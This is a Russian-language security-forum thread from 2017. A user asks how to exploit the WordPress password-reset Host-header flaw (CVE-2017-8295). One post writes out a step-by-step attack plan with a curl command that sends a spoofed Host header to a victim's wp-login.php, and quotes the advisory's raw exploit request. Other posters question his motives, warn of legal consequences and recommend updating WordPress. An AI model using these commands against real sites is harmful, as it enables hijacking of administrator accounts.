ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

02.11.2017, 22:28
|
|
Guest
Сообщений: n/a
Провел на форуме: 1868
Репутация:
0
|
|
|
|
|
|

02.11.2017, 23:17
|
|
Guest
Сообщений: n/a
Провел на форуме: 45893
Репутация:
2
|
|
Всё верно. Команда вводится в терминал Linux, example.com - сайт жертвы. А вот что это за хост evil.com....
В хелпе curl сказано:
-H, --header LINE Передача пользовательского заголовка LINE на сервер (H)
|
|
|
|

03.11.2017, 07:01
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме: 4512
Репутация:
0
|
|
Сообщение от itprepod
itprepod said:
↑
Команда для терминала в линукс?
cURL кроссплатформенный
Вы вообще понимаете, что эта уязвимость дает и какой код должен быть на вашем сайте (evil.com) для проведения атаки?
|
|
|

03.11.2017, 10:06
|
|
Guest
Сообщений: n/a
Провел на форуме: 1868
Репутация:
0
|
|
Сообщение от M_script
M_script said:
↑
cURL кроссплатформенный
Вы вообще понимаете, что эта уязвимость дает и какой код должен быть на вашем сайте (evil.com) для проведения атаки?
Я так понимаю, что с помощью этой уязвимости, можно получить письмо для генерации нового пароля от аккаунта сайта (не важно он с правами админа или нет) на свою почту.
Не знаю какой код должен быть на сайте вместо evil.com, поэтому я здесь.
|
|
|
|

04.11.2017, 03:00
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме: 4512
Репутация:
0
|
|
Сообщение от itprepod
itprepod said:
↑
Я так понимаю, что с помощью этой уязвимости, можно получить письмо для генерации нового пароля от аккаунта сайта (не важно он с правами админа или нет) на свою почту.
С первой попытки не угадали. Попробуйте еще раз.
Сообщение от itprepod
itprepod said:
↑
Не знаю какой код должен быть на сайте вместо evil.com, поэтому я здесь.
То есть, ничего не знаете, но что-то хотите взломать? А знаете, какой срок дают за то, что вы собираетесь сделать?
|
|
|

04.11.2017, 07:19
|
|
Guest
Сообщений: n/a
Провел на форуме: 43449
Репутация:
1
|
|
работа по ру запрещена)
|
|
|
|

04.11.2017, 09:47
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме: 318186
Репутация:
2
|
|
Сообщение от brown
brown said:
↑
работа по ру запрещена)
Это было указанно в описании к уязвимости?))
|
|
|

04.11.2017, 18:57
|
|
Guest
Сообщений: n/a
Провел на форуме: 1868
Репутация:
0
|
|
Сообщение от M_script
M_script said:
↑
С первой попытки не угадали. Попробуйте еще раз.
То есть, ничего не знаете, но что-то хотите взломать? А знаете, какой срок дают за то, что вы собираетесь сделать?
Я в целях помочь админу в закрытии уязвимости, а не в целях навредить.
|
|
|
|

06.11.2017, 02:19
|
|
Guest
Сообщений: n/a
Провел на форуме: 1868
Репутация:
0
|
|
Сообщение от M_script
M_script said:
↑
С первой попытки не угадали. Попробуйте еще раз.
Или с помощью этой уязвимости можно подменить email админа при заказе письма по восстановлению пароля?
Вот здесь:
https://exploitbox.io/vuln/WordPress...2017-8295.html
Показано, что письмо по восстановлению пароля приходит от wordpress@attackers-mxserver.com
Вместо attackers-mxserver.com может быть любой другой домен.
Но перед атакой получается мне нужно создать почту на домене.
Порядок действий:
1. Регаю домен. Пусть будет forhackwp.ru
2. Делаю почту wordpress@forhackwp.ru
3. Запускаю Линукс. Пишу в терминал:
curl -H "Host: forhackwp.ru" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://тут-домен-жертвы/wp-login.php?action=lostpassword
4. Жду письма на свою почту: wordpress@forhackwp.ru ?
Или нет?
Вот тут:
https://exploitbox.io/vuln/WordPress...2017-8295.html
Написано (перевод):
Если злоумышленник отправляет запрос, аналогичный приведенному ниже WordPress по умолчанию
установка, доступная IP-адрес (IP-основе виртуального хоста):
-----[ HTTP Request ]----
POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
user_login=admin&redirect_to=&wp-submit=Get+New+Password
------------------------
WordPress будет вызвать функцию сброса пароля для учетной записи пользователя с правами администратора.
Из-за измененного заголовка узла имя_сервера будет присвоено значение
имя хоста по выбору злоумышленника.
В результате WordPress передаст следующие заголовки и текст сообщения электронной почты
/usr/bin / обертка sendmail:
------[ полученная электронная почта ]-----
Subject: [CompanyX WP] Password Reset
Return-Path:
From: WordPress
Message-ID:
X-Priority: 3
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Someone requested that the password be reset for the following account:
http://companyX-wp/wp/wordpress/
Username: admin
If this was a mistake, just ignore this email and nothing will happen.
To reset your password, visit the following address:
"]http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login =admin>[/URL]
-------------------------------
Как сделать HTTP запрос?
|
|
|
|

06.11.2017, 02:48
|
|
Guest
Сообщений: n/a
Провел на форуме: 169212
Репутация:
441
|
|
Сообщение от itprepod
itprepod said:
↑
Я в целях помочь админу в закрытии уязвимости, а не в целях навредить.
Совета по обновилению WP до последней версии, будет достаточно.
Сообщение от itprepod
itprepod said:
↑
Или нет?
Нет. Письмо улетит админу, но в линках и заголовках будет домен атакующего.
Так же, должны быть соблюдены условия для успешной эксплуатации.
Сообщение от itprepod
itprepod said:
↑
Как сделать HTTP запрос?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|